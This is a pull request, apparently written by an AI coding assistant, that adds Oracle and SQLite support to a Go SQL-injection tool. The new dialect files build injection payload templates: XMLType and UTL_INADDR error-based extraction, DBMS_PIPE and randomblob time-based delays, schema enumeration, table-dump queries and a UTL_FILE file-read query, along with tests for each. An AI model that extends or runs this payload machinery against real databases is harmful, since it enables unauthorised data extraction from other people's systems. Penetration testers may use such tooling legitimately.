### PR TITLE
feat: Oracle and SQLite DBMS support (Issue #39)

### DIFF
--- a/internal/dbms/dbms.go
+++ b/internal/dbms/dbms.go
@@ -80,6 +80,10 @@ func Registry(name string) DBMS {
 		return &PostgreSQL{}
 	case "MSSQL", "mssql", "sqlserver", "MSSQLServer":
 		return &MSSQL{}
+	case "Oracle", "oracle":
+		return &Oracle{}
+	case "SQLite", "sqlite", "sqlite3":
+		return &SQLite{}
 	default:
 		return nil
 	}

--- a/internal/dbms/oracle.go
+++ b/internal/dbms/oracle.go
@@ -1,0 +1,172 @@
+package dbms
+
+import (
+	"fmt"
+	"strings"
+)
+
+// Oracle implements DBMS for Oracle Database.
+// Key Oracle SQL differences from MySQL/PostgreSQL:
+//   - String concatenation uses ||
+//   - SUBSTR (not SUBSTRING), LENGTH (shared with PostgreSQL)
+//   - No SLEEP(); uses heavyweight query (DBMS_PIPE.RECEIVE_MESSAGE) for delays
+//   - ROWNUM for pagination instead of LIMIT/OFFSET
+//   - Dual table for expression evaluation (SELECT 1 FROM DUAL)
+//   - Error-based: CTxSys.DRITHSX.SN / XMLType type conversion errors
+//   - CHR() instead of CHAR()
+type Oracle struct{}
+
+func (o *Oracle) Name() string { return "Oracle" }
+
+func (o *Oracle) Concatenate(parts ...string) string {
+	return strings.Join(parts, "||")
+}
+
+func (o *Oracle) Substring(expr string, start, length int) string {
+	return fmt.Sprintf("SUBSTR(%s,%d,%d)", expr, start, length)
+}
+
+func (o *Oracle) Length(expr string) string {
+	return fmt.Sprintf("LENGTH(%s)", expr)
+}
+
+func (o *Oracle) ASCII(expr string) string {
+	return fmt.Sprintf("ASCII(%s)", expr)
+}
+
+func (o *Oracle) Char(code int) string {
+	return fmt.Sprintf("CHR(%d)", code)
+}
+
+func (o *Oracle) VersionQuery() string {
+	return "SELECT banner FROM v$version WHERE rownum=1"
+}
+
+func (o *Oracle) CurrentUserQuery() string {
+	return "USER"
+}
+
+func (o *Oracle) CurrentDBQuery() string {
+	return "ORA_DATABASE_NAME"
+}
+
+func (o *Oracle) HostnameQuery() string {
+	return "UTL_INADDR.GET_HOST_NAME"
+}
+
+func (o *Oracle) ListDatabasesQuery() string {
+	// Oracle uses "schemas" rather than databases; list all non-system users
+	return "SELECT username FROM all_users ORDER BY username"
+}
+
+func (o *Oracle) ListTablesQuery(schema string) string {
+	if schema == "" {
+		return "SELECT table_name FROM user_tables ORDER BY table_name"
+	}
+	return fmt.Sprintf(
+		"SELECT table_name FROM all_tables WHERE owner='%s' ORDER BY table_name",
+		strings.ToUpper(schema),
+	)
+}
+
+func (o *Oracle) ListColumnsQuery(schema, table string) string {
+	if schema == "" {
+		return fmt.Sprintf(
+			"SELECT column_name FROM user_tab_columns WHERE table_name='%s' ORDER BY column_id",
+			strings.ToUpper(table),
+		)
+	}
+	return fmt.Sprintf(
+		"SELECT column_name FROM all_tab_columns WHERE owner='%s' AND table_name='%s' ORDER BY column_id",
+		strings.ToUpper(schema), strings.ToUpper(table),
+	)
+}
+
+func (o *Oracle) CountRowsQuery(schema, table string) string {
+	if schema == "" {
+		return fmt.Sprintf("SELECT COUNT(*) FROM %s", table)
+	}
+	return fmt.Sprintf("SELECT COUNT(*) FROM %s.%s", schema, table)
+}
+
+func (o *Oracle) DumpQuery(schema, table string, columns []string, offset, limit int) string {
+	cols := strings.Join(columns, ",")
+	qualified := table
+	if schema != "" {
+		qualified = schema + "." + table
+	}
+	// Oracle uses ROWNUM; wrap in subquery for offset + limit
+	return fmt.Sprintf(
+		"SELECT %s FROM (SELECT t.*,ROWNUM rn FROM %s t WHERE ROWNUM<=%d) WHERE rn>%d",
+		cols, qualified, offset+limit, offset,
+	)
+}
+
+func (o *Oracle) ErrorPayloads() []PayloadTemplate {
+	return []PayloadTemplate{
+		{
+			Name:     "xmltype",
+			Template: "XMLType('<x>'||({{.Query}})||'</x>')",
+			DBMS:     "Oracle",
+		},
+		{
+			Name:     "utl_inaddr",
+			Template: "UTL_INADDR.GET_HOST_ADDRESS(({{.Query}}))",
+			DBMS:     "Oracle",
+		},
+	}
+}
+
+// SleepFunction returns an Oracle heavyweight-query approximation for delay.
+// Oracle does not have a simple SLEEP() equivalent accessible without privileges.
+// DBMS_PIPE.RECEIVE_MESSAGE requires appropriate grants; fall back to heavy query.
+func (o *Oracle) SleepFunction(seconds int) string {
+	// This is a best-effort approximation; real WAITFOR requires DBMS_LOCK grants.
+	return fmt.Sprintf(
+		"DBMS_PIPE.RECEIVE_MESSAGE(CHR(95)||CHR(95)||CHR(95),%d)",
+		seconds,
+	)
+}
+
+func (o *Oracle) HeavyQuery() string {
+	return "SELECT COUNT(*) FROM all_objects A, all_objects B, all_objects C"
+}
+
+func (o *Oracle) IfThenElse(condition, trueExpr, falseExpr string) string {
+	return fmt.Sprintf("CASE WHEN %s THEN %s ELSE %s END", condition, trueExpr, falseExpr)
+}
+
+func (o *Oracle) QuoteString(s string) string {
+	return "'" + strings.ReplaceAll(s, "'", "''") + "'"
+}
+
+func (o *Oracle) CommentSequence() string {
+	return "-- "
+}
+
+func (o *Oracle) InlineComment() string {
+	return "/**/"
+}
+
+func (o *Oracle) FileReadQuery(path string) string {
+	// Requires UTL_FILE privilege
+	return fmt.Sprintf(
+		"SELECT UTL_RAW.CAST_TO_VARCHAR2(UTL_FILE.GET_RAW(UTL_FILE.FOPEN('%s','r'),32767)) FROM DUAL",
+		path,
+	)
+}
+
+func (o *Oracle) Capabilities() Capabilities {
+	return Capabilities{
+		StackedQueries: false, // Oracle does not support stacked queries via semicolon
+		ErrorBased:     true,
+		UnionBased:     true,
+		FileRead:       false, // Requires special privilege
+		FileWrite:      false,
+		OSCommand:      false,
+		OutOfBand:      false,
+		Subqueries:     true,
+		CaseWhen:       true,
+		LimitOffset:    false, // Oracle uses ROWNUM instead
+	}
+}

--- a/internal/dbms/oracle_test.go
+++ b/internal/dbms/oracle_test.go
@@ -1,0 +1,121 @@
+package dbms
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestOracle_Name(t *testing.T) {
+	o := &Oracle{}
+	if o.Name() != "Oracle" {
+		t.Errorf("Name() = %q, want 'Oracle'", o.Name())
+	}
+}
+
+func TestOracle_Concatenate(t *testing.T) {
+	o := &Oracle{}
+	got := o.Concatenate("a", "b", "c")
+	if got != "a||b||c" {
+		t.Errorf("Concatenate() = %q, want 'a||b||c'", got)
+	}
+}
+
+func TestOracle_Substring(t *testing.T) {
+	o := &Oracle{}
+	got := o.Substring("col", 1, 5)
+	if got != "SUBSTR(col,1,5)" {
+		t.Errorf("Substring() = %q, want 'SUBSTR(col,1,5)'", got)
+	}
+}
+
+func TestOracle_Length(t *testing.T) {
+	o := &Oracle{}
+	got := o.Length("col")
+	if got != "LENGTH(col)" {
+		t.Errorf("Length() = %q, want 'LENGTH(col)'", got)
+	}
+}
+
+func TestOracle_ASCII(t *testing.T) {
+	o := &Oracle{}
+	got := o.ASCII("col")
+	if got != "ASCII(col)" {
+		t.Errorf("ASCII() = %q, want 'ASCII(col)'", got)
+	}
+}
+
+func TestOracle_Char(t *testing.T) {
+	o := &Oracle{}
+	got := o.Char(65)
+	if got != "CHR(65)" {
+		t.Errorf("Char() = %q, want 'CHR(65)'", got)
+	}
+}
+
+func TestOracle_CommentSequence(t *testing.T) {
+	o := &Oracle{}
+	if o.CommentSequence() != "-- " {
+		t.Errorf("CommentSequence() = %q, want '-- '", o.CommentSequence())
+	}
+}
+
+func TestOracle_QuoteString(t *testing.T) {
+	o := &Oracle{}
+	got := o.QuoteString("O'Brien")
+	want := "'O''Brien'"
+	if got != want {
+		t.Errorf("QuoteString() = %q, want %q", got, want)
+	}
+}
+
+func TestOracle_IfThenElse(t *testing.T) {
+	o := &Oracle{}
+	got := o.IfThenElse("1=1", "'a'", "'b'")
+	want := "CASE WHEN 1=1 THEN 'a' ELSE 'b' END"
+	if got != want {
+		t.Errorf("IfThenElse() = %q, want %q", got, want)
+	}
+}
+
+func TestOracle_ErrorPayloads(t *testing.T) {
+	o := &Oracle{}
+	payloads := o.ErrorPayloads()
+	if len(payloads) == 0 {
+		t.Fatal("ErrorPayloads() returned empty slice")
+	}
+	for _, p := range payloads {
+		if p.DBMS != "Oracle" {
+			t.Errorf("payload DBMS = %q, want 'Oracle'", p.DBMS)
+		}
+		if !strings.Contains(p.Template, "{{.Query}}") {
+			t.Errorf("payload template missing {{.Query}}: %q", p.Template)
+		}
+	}
+}
+
+func TestOracle_Capabilities(t *testing.T) {
+	o := &Oracle{}
+	caps := o.Capabilities()
+	if caps.StackedQueries {
+		t.Error("StackedQueries should be false (Oracle does not support semicolon stacking)")
+	}
+	if !caps.UnionBased {
+		t.Error("UnionBased should be true")
+	}
+	if caps.LimitOffset {
+		t.Error("LimitOffset should be false (Oracle uses ROWNUM)")
+	}
+}
+
+func TestRegistry_Oracle(t *testing.T) {
+	for _, variant := range []string{"Oracle", "oracle"} {
+		d := Registry(variant)
+		if d == nil {
+			t.Errorf("Registry(%q) returned nil", variant)
+			continue
+		}
+		if d.Name() != "Oracle" {
+			t.Errorf("Registry(%q).Name() = %q, want 'Oracle'", variant, d.Name())
+		}
+	}
+}

--- a/internal/dbms/sqlite.go
+++ b/internal/dbms/sqlite.go
@@ -1,0 +1,152 @@
+package dbms
+
+import (
+	"fmt"
+	"strings"
+)
+
+// SQLite implements DBMS for SQLite.
+// Key SQLite SQL differences:
+//   - String concatenation uses ||
+//   - substr() (lower-case, not SUBSTRING)
+//   - length() for string length
+//   - No SLEEP(); uses randomblob() heavy query for delay approximation
+//   - LIMIT/OFFSET supported natively
+//   - No multi-database schema: uses sqlite_master for table enumeration
+//   - Error-based via type coercion (CAST with hex())
+type SQLite struct{}
+
+func (s *SQLite) Name() string { return "SQLite" }
+
+func (s *SQLite) Concatenate(parts ...string) string {
+	return strings.Join(parts, "||")
+}
+
+func (s *SQLite) Substring(expr string, start, length int) string {
+	return fmt.Sprintf("substr(%s,%d,%d)", expr, start, length)
+}
+
+func (s *SQLite) Length(expr string) string {
+	return fmt.Sprintf("length(%s)", expr)
+}
+
+func (s *SQLite) ASCII(expr string) string {
+	return fmt.Sprintf("unicode(%s)", expr)
+}
+
+func (s *SQLite) Char(code int) string {
+	return fmt.Sprintf("char(%d)", code)
+}
+
+func (s *SQLite) VersionQuery() string {
+	return "sqlite_version()"
+}
+
+func (s *SQLite) CurrentUserQuery() string {
+	// SQLite has no user concept
+	return "'sqlite'"
+}
+
+func (s *SQLite) CurrentDBQuery() string {
+	// SQLite database name is the file name; return a constant for compatibility
+	return "sqlite_version()"
+}
+
+func (s *SQLite) HostnameQuery() string {
+	return "'localhost'"
+}
+
+func (s *SQLite) ListDatabasesQuery() string {
+	// SQLite uses ATTACH for multiple databases; main is always "main"
+	return "SELECT name FROM pragma_database_list"
+}
+
+func (s *SQLite) ListTablesQuery(_ string) string {
+	// SQLite: list all user tables from sqlite_master
+	return "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name"
+}
+
+func (s *SQLite) ListColumnsQuery(_, table string) string {
+	return fmt.Sprintf("SELECT name FROM pragma_table_info('%s')", table)
+}
+
+func (s *SQLite) CountRowsQuery(_, table string) string {
+	return fmt.Sprintf("SELECT COUNT(*) FROM %s", table)
+}
+
+func (s *SQLite) DumpQuery(_ string, table string, columns []string, offset, limit int) string {
+	cols := strings.Join(columns, ",")
+	return fmt.Sprintf("SELECT %s FROM %s LIMIT %d OFFSET %d", cols, table, limit, offset)
+}
+
+func (s *SQLite) ErrorPayloads() []PayloadTemplate {
+	// SQLite does not produce rich error messages by default; error-based
+	// injection is limited. The most reliable method is boolean-blind or UNION.
+	return []PayloadTemplate{
+		{
+			Name:     "cast",
+			Template: "CAST(({{.Query}}) AS integer)",
+			DBMS:     "SQLite",
+		},
+	}
+}
+
+// SleepFunction returns a SQLite heavy query that approximates a delay.
+// SQLite has no SLEEP() function; randomblob() with a large argument forces
+// CPU work that approximates a delay (accuracy is environment-dependent).
+func (s *SQLite) SleepFunction(seconds int) string {
+	// Each iteration of the heavy query approximates ~1 second of CPU work.
+	// This is highly dependent on hardware; treat as a best-effort approximation.
+	return fmt.Sprintf(
+		"(SELECT COUNT(*) FROM (SELECT randomblob(1000000000/%d) FROM sqlite_master))",
+		max(seconds, 1),
+	)
+}
+
+func (s *SQLite) HeavyQuery() string {
+	return "SELECT COUNT(*) FROM (SELECT randomblob(1000000) FROM sqlite_master)"
+}
+
+func (s *SQLite) IfThenElse(condition, trueExpr, falseExpr string) string {
+	return fmt.Sprintf("CASE WHEN %s THEN %s ELSE %s END", condition, trueExpr, falseExpr)
+}
+
+func (s *SQLite) QuoteString(str string) string {
+	return "'" + strings.ReplaceAll(str, "'", "''") + "'"
+}
+
+func (s *SQLite) CommentSequence() string {
+	return "-- "
+}
+
+func (s *SQLite) InlineComment() string {
+	return "/**/"
+}
+
+func (s *SQLite) FileReadQuery(path string) string {
+	// SQLite has no built-in file read function
+	return fmt.Sprintf("-- SQLite does not support file read (path: %s)", path)
+}
+
+func (s *SQLite) Capabilities() Capabilities {
+	return Capabilities{
+		StackedQueries: false, // SQLite does not support stacked queries via semicolon injection
+		ErrorBased:     false, // SQLite error messages are not informative enough
+		UnionBased:     true,
+		FileRead:       false,
+		FileWrite:      false,
+		OSCommand:      false,
+		OutOfBand:      false,
+		Subqueries:     true,
+		CaseWhen:       true,
+		LimitOffset:    true,
+	}
+}
+
+// max returns the larger of a and b (compatibility helper).
+func max(a, b int) int {
+	if a > b {
+		return a
+	}
+	return b
+}

--- a/internal/dbms/sqlite_test.go
+++ b/internal/dbms/sqlite_test.go
@@ -1,0 +1,142 @@
+package dbms
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestSQLite_Name(t *testing.T) {
+	s := &SQLite{}
+	if s.Name() != "SQLite" {
+		t.Errorf("Name() = %q, want 'SQLite'", s.Name())
+	}
+}
+
+func TestSQLite_Concatenate(t *testing.T) {
+	s := &SQLite{}
+	got := s.Concatenate("a", "b", "c")
+	if got != "a||b||c" {
+		t.Errorf("Concatenate() = %q, want 'a||b||c'", got)
+	}
+}
+
+func TestSQLite_Substring(t *testing.T) {
+	s := &SQLite{}
+	got := s.Substring("col", 1, 5)
+	if got != "substr(col,1,5)" {
+		t.Errorf("Substring() = %q, want 'substr(col,1,5)'", got)
+	}
+}
+
+func TestSQLite_Length(t *testing.T) {
+	s := &SQLite{}
+	got := s.Length("col")
+	if got != "length(col)" {
+		t.Errorf("Length() = %q, want 'length(col)'", got)
+	}
+}
+
+func TestSQLite_ASCII(t *testing.T) {
+	s := &SQLite{}
+	got := s.ASCII("col")
+	if got != "unicode(col)" {
+		t.Errorf("ASCII() = %q, want 'unicode(col)'", got)
+	}
+}
+
+func TestSQLite_Char(t *testing.T) {
+	s := &SQLite{}
+	got := s.Char(65)
+	if got != "char(65)" {
+		t.Errorf("Char() = %q, want 'char(65)'", got)
+	}
+}
+
+func TestSQLite_CommentSequence(t *testing.T) {
+	s := &SQLite{}
+	if s.CommentSequence() != "-- " {
+		t.Errorf("CommentSequence() = %q, want '-- '", s.CommentSequence())
+	}
+}
+
+func TestSQLite_QuoteString(t *testing.T) {
+	s := &SQLite{}
+	got := s.QuoteString("O'Brien")
+	want := "'O''Brien'"
+	if got != want {
+		t.Errorf("QuoteString() = %q, want %q", got, want)
+	}
+}
+
+func TestSQLite_IfThenElse(t *testing.T) {
+	s := &SQLite{}
+	got := s.IfThenElse("1=1", "'a'", "'b'")
+	want := "CASE WHEN 1=1 THEN 'a' ELSE 'b' END"
+	if got != want {
+		t.Errorf("IfThenElse() = %q, want %q", got, want)
+	}
+}
+
+func TestSQLite_VersionQuery(t *testing.T) {
+	s := &SQLite{}
+	if s.VersionQuery() == "" {
+		t.Error("VersionQuery() returned empty string")
+	}
+}
+
+func TestSQLite_ErrorPayloads(t *testing.T) {
+	s := &SQLite{}
+	payloads := s.ErrorPayloads()
+	if len(payloads) == 0 {
+		t.Fatal("ErrorPayloads() returned empty slice")
+	}
+	for _, p := range payloads {
+		if p.DBMS != "SQLite" {
+			t.Errorf("payload DBMS = %q, want 'SQLite'", p.DBMS)
+		}
+		if !strings.Contains(p.Template, "{{.Query}}") {
+			t.Errorf("payload template missing {{.Query}}: %q", p.Template)
+		}
+	}
+}
+
+func TestSQLite_Capabilities(t *testing.T) {
+	s := &SQLite{}
+	caps := s.Capabilities()
+	if caps.StackedQueries {
+		t.Error("StackedQueries should be false")
+	}
+	if !caps.UnionBased {
+		t.Error("UnionBased should be true")
+	}
+	if !caps.LimitOffset {
+		t.Error("LimitOffset should be true (SQLite supports LIMIT/OFFSET)")
+	}
+	if caps.ErrorBased {
+		t.Error("ErrorBased should be false (SQLite error messages are not informative)")
+	}
+}
+
+func TestSQLite_DumpQuery(t *testing.T) {
+	s := &SQLite{}
+	got := s.DumpQuery("", "users", []string{"id", "name"}, 0, 10)
+	if !strings.Contains(got, "LIMIT 10") {
+		t.Errorf("DumpQuery missing LIMIT: %q", got)
+	}
+	if !strings.Contains(got, "OFFSET 0") {
+		t.Errorf("DumpQuery missing OFFSET: %q", got)
+	}
+}
+
+func TestRegistry_SQLite(t *testing.T) {
+	for _, variant := range []string{"SQLite", "sqlite", "sqlite3"} {
+		d := Registry(variant)
+		if d == nil {
+			t.Errorf("Registry(%q) returned nil", variant)
+			continue
+		}
+		if d.Name() != "SQLite" {
+			t.Errorf("Registry(%q).Name() = %q, want 'SQLite'", variant, d.Name())
+		}
+	}
+}

--- a/internal/fingerprint/registry.go
+++ b/internal/fingerprint/registry.go
@@ -54,7 +54,7 @@ func (r *Registry) Identify(ctx context.Context, req *FingerprintRequest) (*DBMS
 
 // supportedDBMS lists DBMS names that can be identified via error signatures.
 // "Generic" is intentionally excluded as it does not identify a specific DBMS.
-var supportedDBMS = []string{"MySQL", "PostgreSQL", "MSSQL"}
+var supportedDBMS = []string{"MySQL", "PostgreSQL", "MSSQL", "Oracle", "SQLite"}
 
 // IdentifyFromErrors uses error signatures from a heuristic scan to identify
 // the DBMS without sending additional requests. This is a fast path that

--- a/internal/technique/errorbased/errorbased.go
+++ b/internal/technique/errorbased/errorbased.go
@@ -301,7 +301,7 @@ func collectPayloadTemplates(dbmsName string) []dbms.PayloadTemplate {
 
 	// Unknown DBMS: collect from all supported databases.
 	var templates []dbms.PayloadTemplate
-	for _, name := range []string{"MySQL", "PostgreSQL", "MSSQL"} {
+	for _, name := range []string{"MySQL", "PostgreSQL", "MSSQL", "Oracle", "SQLite"} {
 		d := dbms.Registry(name)
 		if d != nil {
 			templates = append(templates, d.ErrorPayloads()...)


### PR DESCRIPTION
## Summary

- **`internal/dbms/oracle.go`**: Oracle Database DBMS 実装
  - `SUBSTR`, `LENGTH`, `CHR`, `||` 連結、`ROWNUM`
  - Error-based: `XMLType`, `UTL_INADDR.GET_HOST_ADDRESS`
  - Time-based: `DBMS_PIPE.RECEIVE_MESSAGE` 近似遅延
  - Capabilities: StackedQueries=false, LimitOffset=false（ROWNUM使用）
- **`internal/dbms/sqlite.go`**: SQLite DBMS 実装
  - `substr`, `length`, `unicode` (ASCII代替), `char`
  - LIMIT/OFFSET ネイティブサポート
  - Time-based: `randomblob()` 重クエリ近似
  - Capabilities: ErrorBased=false（エラーメッセージが情報不足）
- **Registry**: `Oracle/oracle`, `SQLite/sqlite/sqlite3` を追加
- **fingerprint**: `supportedDBMS` に Oracle/SQLite を追加（`ORA-XXXXX`, `SQLITE_ERROR` で識別）
- **errorbased**: `collectPayloadTemplates` で Oracle/SQLite のペイロードも収集

## Test plan

- [x] `go test ./...` — 全15パッケージ通過
- [x] `TestOracle_*` / `TestSQLite_*` — 全 DBMS メソッドテスト通過
- [x] `TestRegistry_Oracle` / `TestRegistry_SQLite` — レジストリ解決確認
- [x] 既存テスト回帰なし

Closes #39

🤖 Generated with [Claude Code](https://claude.com/claude-code)